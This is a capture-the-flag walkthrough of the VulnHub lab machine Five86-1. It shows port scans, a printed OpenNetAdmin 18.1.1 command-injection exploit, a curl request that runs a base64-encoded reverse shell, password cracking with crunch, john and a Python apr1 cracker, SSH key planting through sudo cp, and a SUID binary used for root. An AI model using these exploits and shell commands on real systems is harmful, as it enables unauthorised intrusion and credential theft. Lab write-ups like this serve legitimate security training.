Five86-1 - VulnHub
Basic TCP port scanning
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# nmap -sS --min-rate 5000 -v -n -Pn --open 192.168.1.139 -oN ports
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 14:45 EST
Initiating ARP Ping Scan at 14:45
Scanning 192.168.1.139 [1 port]
Completed ARP Ping Scan at 14:45, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:45
Scanning 192.168.1.139 [1000 ports]
Discovered open port 80/tcp on 192.168.1.139
Discovered open port 22/tcp on 192.168.1.139
Discovered open port 10000/tcp on 192.168.1.139
Completed SYN Stealth Scan at 14:45, 0.08s elapsed (1000 total ports)
Nmap scan report for 192.168.1.139
Host is up (0.000099s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10000/tcp open snet-sensor-mgmt
MAC Address: 08:00:27:34:7E:BF (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.040KB)
This scan reported three open ports, 22, 80 and 10000: two web servers and SSH.
Basic TCP service scanning
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# nmap -sCV -p22,80,10000 192.168.1.139 -oN services
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 14:46 EST
Nmap scan report for 192.168.1.139
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 69e63cbf72f7a000f9d9f41d68e23cbd (RSA)
| 256 459ec71e9f5bd3cefc1756f2f642abdc (ECDSA)
|_ 256 ae0a9e92645f8620c41144e05832e505 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/ona
10000/tcp open http MiniServ 1.920 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:34:7E:BF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.54 seconds
This second service scan reported a /robots.txt with a potential path in it, /ona. The SSH and Apache versions had no obvious known vulnerabilities, so I decided to browse to port 80 first.
Nothing interesting there, just a blank page, so I moved on to port 10000.
There I had a Webmin login panel. I tried the basic credentials admin / admin and they did not work, so, knowing the version of this service, I looked for vulnerabilities.
I found an unauthenticated remote command execution exploit, but it did not apply here.
I continued by looking at robots.txt.
It only contained the path nmap had already reported, so nothing new there. Accessing /ona I found the following:
Something interesting: we are already authenticated as a guest user.
The top right corner showed what this panel was: OpenNetAdmin, a network management service. At this point I wanted to know its version in order to look for exploits.
It was version 18.1.1, so I searched for exploits with searchsploit.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# searchsploit opennetadmin
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Three exploits came up, two of which target this version, one of them a Metasploit module. I downloaded the bash script.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# searchsploit -m php/webapps/47691.sh
Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/47691
Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh
Codes: N/A
Verified: False
File Type: ASCII text
Copied to: /home/kali/Vulnhub/Five86/47691.sh
The exploit code is as follows:
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The structure of this exploit is as follows:
- Takes the first argument passed to the script (the server URL) and stores it as `URL`.
- Starts an infinite loop that reads the command we want to execute into the variable `cmd`.
- Sends the prepared request and extracts the command's output from the response with a sed range (everything between the BEGIN and END markers).
If we run the curl command ourselves, replacing URL and cmd, we see that we get remote command execution, in this case as the user www-data.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";whoami;echo \"END\"&xajaxargs[]=ping" "http://192.168.1.139/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
www-data
I then tried to get a reverse shell, which gave me problems, so the method that worked for me is the following. First I base64 encoded the command that would make the machine connect back to me.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# echo "sh -i >& /dev/tcp/192.168.1.136/443 0>&1" | base64
c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEzNi80NDMgMD4mMQo=
Now the command just decodes the Base64 string and pipes the result into bash.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEzNi80NDMgMD4mMQo= | base64 -d | bash;echo \"END\"&xajaxargs[]=ping" "http://192.168.1.139/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
Run the command and gain access as www-data.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.136] from (UNKNOWN) [192.168.1.139] 37480
sh: 0: can't access tty; job control turned off
$ whoami
www-data
I upgraded the shell to a full TTY to work more comfortably.
$ script /dev/null -c bash
Script started, file is /dev/null
www-data@five86-1:/opt/ona/www$ ^Z
zsh: suspended nc -lvnp 443
┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo; fg
[1] + continued nc -lvnp 443
reset
reset: unknown terminal type unknown
Terminal type? xterm
I also had to set the rows and columns of the remote shell to match my terminal, which had 17 rows and 157 columns.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# stty size
17 157
On the victim machine it was 24 by 80, so after exporting TERM and SHELL I set it to match.
www-data@five86-1:/opt/ona/www$ export TERM=xterm
www-data@five86-1:/opt/ona/www$ export SHELL=bash
www-data@five86-1:/opt/ona/www$ stty size
24 80
www-data@five86-1:/opt/ona/www$ stty rows 17 columns 157
I listed the files in the current directory but found nothing interesting.
www-data@five86-1:/opt/ona/www$ ls
config config_dnld.php dcm.php images include index.php local login.php logout.php modules plugins winc workspace_plugins
www-data@five86-1:/opt/ona/www$
After a little research I found a .htpasswd in /var/www/ that I had read permission on.
www-data@five86-1:/var/www$ ls
html
www-data@five86-1:/var/www$ ls -la
total 16
drwxr-xr-x 3 root root 4096 Jan 1 2020 .
drwxr-xr-x 14 root root 4096 Jan 1 2020 ..
-rw-r--r-- 1 root root 202 Jan 1 2020 .htpasswd
drwxr-xr-x 3 root root 4096 Jan 1 2020 html
www-data@five86-1:/var/www$
Its content was as follows:
www-data@five86-1:/var/www$ cat .htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
There was a username and a hash, plus a comment saying that a conventional dictionary such as rockyou.txt would fail to crack this hash and that the password is 10 characters drawn from the set aefhrt. So what I needed was a dictionary of 10-character candidates built from exactly those characters.
I ran crunch with the minimum and maximum length set to 10, followed by the character set given in the .htpasswd, and wrote the result to pass.txt.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# crunch 10 10 aefhrt -o pass.txt
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176
crunch: 100% completed generating output
Once the dictionary was generated I realised it was much larger than rockyou.txt.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# wc -l pass.txt
60466176 pass.txt
Cracking against this would take a long time, so I made it shorter: crunch generates every combination of the given characters, including candidates that use only some of them rather than all six. Since the hint lists six characters, I kept only the candidates that contain all of them by applying the following awk filter.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# awk '/a/&&/e/&&/f/&&/h/&&/r/&&/t/' pass.txt > pass_final.txt
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# wc -l pass_final.txt
16435440 pass_final.txt
With far fewer candidates, I started the attack with john.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# john --wordlist=pass_final.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fatherrrrr (douglas)
1g 0:00:00:23 DONE (2023-03-08 15:27) 0.04295g/s 254251p/s 254251c/s 254251C/s fatherrhaf..fatherttae
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
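As an added example (my code, not the author's tooling), this Python ties together the .htpasswd hash and the dictionary reduction above: it generates only the candidates that use every character of the hinted set (the same set that crunch plus the awk filter produces, without writing the 634 MB file), counts that set by inclusion-exclusion to confirm the 16435440 figure, and verifies a candidate against the `$apr1$` hash with a from-scratch implementation of Apache's md5crypt variant.

```python
import hashlib
from itertools import product
from math import comb

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HTPASSWD_HASH = "$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1"  # douglas's hash from .htpasswd above

def apr1_md5(password, salt):
    """Apache's $apr1$ flavour of md5crypt, what `htpasswd -m` writes."""
    pw, sp, magic = password.encode(), salt.encode()[:8], b"$apr1$"
    ctx = hashlib.md5(pw + magic + sp)
    alt = hashlib.md5(pw + sp + pw).digest()
    pl = len(pw)
    while pl > 0:                      # mix in len(pw) bytes of the alternate digest
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                           # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):              # fixed 1000 stretching rounds
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(sp)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    def to64(v, n):                    # crypt(3)-style base64, low 6 bits first
        return bytes(ITOA64[(v >> (6 * k)) & 0x3F] for k in range(n))
    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    enc = b"".join(to64(final[a] << 16 | final[b] << 8 | final[c], 4) for a, b, c in groups)
    return (magic + sp + b"$" + enc + to64(final[11], 2)).decode()

def full_coverage_candidates(charset, length):
    """Same set as `crunch L L charset` filtered by awk: strings using every character."""
    need = set(charset)
    for combo in product(charset, repeat=length):
        if need.issubset(combo):
            yield "".join(combo)

def full_coverage_count(charset_size, length):
    """Inclusion-exclusion size of that set; 16435440 for six characters and length 10."""
    return sum((-1) ** k * comb(charset_size, k) * (charset_size - k) ** length
               for k in range(charset_size + 1))

def crack(target_hash, candidates):
    salt = target_hash.split("$")[2]   # "$apr1$<salt>$<digest>"; first match or None
    return next((pw for pw in candidates if apr1_md5(pw, salt) == target_hash), None)
```

Running `crack(HTPASSWD_HASH, full_coverage_candidates("aefhrt", 10))` walks the same space john did, but at Python speed it is far slower than john's 254k candidates per second, which is the point of doing the reduction before handing the list to a real cracker.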
So I cracked the password: fatherrrrr. I noticed that douglas was an active user on the system, so I tried to authenticate with this credential and it worked.
www-data@five86-1:/var/www$ su douglas
Password:
douglas@five86-1:/var/www$ whoami
douglas
As douglas I searched the whole filesystem for files and directories I owned, filtering out the /proc and /sys entries from the output, but found nothing interesting.
douglas@five86-1:/var/www$ find / -user douglas 2>/dev/null | grep -vE 'proc|sys'
/run/user/1005
/home/douglas
/home/douglas/.ssh
/home/douglas/.ssh/id_rsa.pub
/home/douglas/.ssh/id_rsa
/home/douglas/.bash_history
/home/douglas/.local
/home/douglas/.local/share
/home/douglas/.local/share/nano
Checking sudo, I realised I could run /bin/cp as the user jen.
douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User douglas may run the following commands on five86-1:
(jen) NOPASSWD: /bin/cp
There are two ways to try to escalate at this point, taking advantage of how SSH key authentication works:
- Copy jen's private key (if there is one) to /tmp and use it as the identity key to log in via SSH (provided it is not encrypted).
- Copy my own public key as authorized_keys into jen's .ssh directory, allowing SSH access without a password.
In this case I used the second option, since jen had no id_rsa in /home/jen/.ssh.
┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa.pub
ssh-rsa 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 root@kali
With my public key saved in /tmp as authorized_keys, I copied it to /home/jen/.ssh/authorized_keys as the user jen.
douglas@five86-1:/tmp$ ls
authorized_keys tmp.z1IYvnHLGU
douglas@five86-1:/tmp$ cat authorized_keys
ssh-rsa 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 root@kali
douglas@five86-1:/tmp$ sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/authorized_keys
Now I could simply log in via SSH as jen without a password.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# ssh jen@192.168.1.139
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Tue Mar 7 19:21:42 2023 from 192.168.1.136
jen@five86-1:~$
Again I searched for all the files and directories jen owned, filtering out /proc and /sys.
jen@five86-1:~$ find / -user jen 2>/dev/null | grep -vE "proc|sys"
/run/user/1003
/var/mail/jen
/dev/pts/1
/home/jen
/home/jen/.ssh
/home/jen/.ssh/authorized_keys
/home/jen/reports
/home/jen/reports/Audit.txt
/home/jen/reports/IT_Budget.txt
/home/jen/.bash_history
This time I did find a path that interested me: /var/mail/jen. It was an email from Roy to Jen telling her that the password of moss (another system user) was now Fire!Fire!.
jen@five86-1:~$ cat /var/mail/jen
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
(envelope-from <roy@five86-1>)
id 1imZBc-0001FU-El
for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500
Hi Jen,
As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.
But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!
Moss will understand (ha ha ha ha).
Tanks,
Roy
I tried that credential for the user moss and it worked.
jen@five86-1:~$ ls /home
douglas jen moss richmond roy
jen@five86-1:~$ su moss
Password:
moss@five86-1:/home/jen$ whoami
moss
moss@five86-1:/home/jen$
As moss I searched for SUID binaries and found a supposed "game".
moss@five86-1:~$ find / -perm -4755 2>/dev/null
/var/games/animals
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/home/moss/.games/upyourgame
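As an added defensive counterpart to the SUID search (my example, not the author's), this Python reproduces `find / -perm -4000` and flags the entries that stand out on this box: SUID files outside the package-managed prefixes or hidden under a dot directory, which is exactly where /var/games/animals and /home/moss/.games/upyourgame land. The trusted prefix list is an assumption for a Debian-style layout, and the sample list is constructed from the find output above.

```python
import os
import stat

# Assumption: prefixes where SUID binaries are normally package-managed on Debian.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")

# Constructed from the `find / -perm -4755` output above.
FIVE86_SUID = [
    "/var/games/animals", "/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/su", "/usr/bin/umount", "/usr/bin/mount", "/usr/bin/sudo",
    "/usr/bin/gpasswd", "/usr/bin/chfn", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/sbin/exim4", "/home/moss/.games/upyourgame",
]

def classify_suid(paths, trusted=TRUSTED_PREFIXES):
    """Return the SUID paths worth a closer look: anything outside the
    package-managed prefixes or with a hidden (dot) path component."""
    flagged = []
    for p in paths:
        hidden = any(part.startswith(".") for part in p.split("/") if part)
        if hidden or not p.startswith(trusted):
            flagged.append(p)
    return flagged

def find_suid(root="/"):
    """Walk the filesystem like `find / -perm -4000`, skipping pseudo-filesystems
    and symlinks, and return the regular files with the setuid bit set."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath in ("/proc", "/sys", "/dev"):
            dirnames[:] = []          # prune: nothing real to audit in here
            continue
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)   # lstat so symlinks are not followed
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(full)
    return found

if __name__ == "__main__":
    for p in classify_suid(find_suid()):
        print("review:", p)
```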
I ran it, answered the five questions with "yes" and was automatically given root 😞. It looked like a joke, but it really did make me root.
moss@five86-1:/var/games/animals$ /home/moss/.games/upyourgame
Would you like to play a game? yes
Could you please repeat that? yes
Nope, you'll need to enter that again. yes
You entered: No. Is this correct? yes
We appear to have a problem? Do we have a problem? yes
Made in Britain.
# whoami
root
#
I took a closer look at the binary in Ghidra and it looked like this:
It simply asks the questions and reads the user input into the corresponding variables; at the end of the program it changes the UID to 0 (root) and spawns /bin/sh.